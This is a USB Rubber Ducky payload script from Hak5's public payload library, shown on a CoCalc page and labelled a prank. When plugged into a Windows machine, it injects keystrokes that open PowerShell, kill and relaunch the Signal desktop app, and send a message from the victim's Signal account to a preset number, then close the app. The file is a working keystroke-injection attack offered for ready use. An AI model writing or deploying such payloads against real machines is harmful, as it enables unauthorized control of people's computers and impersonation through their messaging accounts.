Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/SendSignalMessages/payload.txt
2968 views
1
REM #########################################
2
REM # |
3
REM # Title : Send Signal Messages |
4
REM # Author : Aleff |
5
REM # Version : 1.0 |
6
REM # Category : Prank, Execution |
7
REM # Target : Windows 10-11 |
8
REM # |
9
REM #########################################
10
11
REM Requirements:
12
REM - Internet Connection
13
REM - Signal App installed
14
REM Payload Plug-And-Play but can be edited as you want the message
15
16
REM REQUIRED - Receiver number
17
DEFINE NUMBER 3332211000
18
19
REM REQUIRED - Message to send
20
DEFINE MESSAGE YOUR_MESSAGE
21
22
DELAY 1000
23
GUI r
24
DELAY 500
25
STRING powershell
26
ENTER
27
DELAY 500
28
STRING Stop-Process -Name "Signal"
29
ENTER
30
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
31
ENTER
32
DELAY 5000
33
TAB
34
TAB
35
TAB
36
ENTER
37
DELAY 100
38
STRING NUMBER
39
DELAY 100
40
TAB
41
DELAY 100
42
ENTER
43
DELAY 200
44
45
REM This is the message that will be sent.
46
REM You can change it as you want, if you want.
47
STRING YOUR_MESSAGE
48
ENTER
49
50
REM Closing Signal App
51
DELAY 500
52
ALT F4
53
54